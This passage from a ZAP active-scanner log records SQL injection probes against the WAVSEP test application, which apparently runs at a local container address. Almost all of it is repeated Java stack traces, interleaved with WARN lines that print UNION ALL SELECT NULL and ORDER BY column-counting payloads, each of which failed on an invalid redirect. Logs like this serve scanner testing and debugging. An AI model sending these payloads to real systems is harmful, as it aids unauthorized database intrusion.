org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9682353 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [') UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/') UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9682354 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [' ORDER BY 1#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/' ORDER BY 1# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTest(SQLiUnionEngine.java:700) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTechnique(SQLiUnionEngine.java:724) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:818) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 21 more 9682354 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9682355 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [' ORDER BY 2980#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/' ORDER BY 2980# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTest(SQLiUnionEngine.java:700) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTechnique(SQLiUnionEngine.java:724) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:818) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 21 more 9682356 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [' UNION ALL SELECT NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/' UNION ALL SELECT NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9682356 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9682357 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [' UNION ALL SELECT NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/' UNION ALL SELECT NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9682358 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9682358 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [' UNION ALL SELECT NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/' UNION ALL SELECT NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9682359 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini%' ORDER BY 1#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini%' ORDER BY 1# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTest(SQLiUnionEngine.java:700) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTechnique(SQLiUnionEngine.java:724) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:818) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 21 more 9682359 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [' UNION ALL SELECT NULL,NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/' UNION ALL SELECT NULL,NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9682360 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini%' ORDER BY 7255#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini%' ORDER BY 7255# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTest(SQLiUnionEngine.java:700) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTechnique(SQLiUnionEngine.java:724) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:818) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) 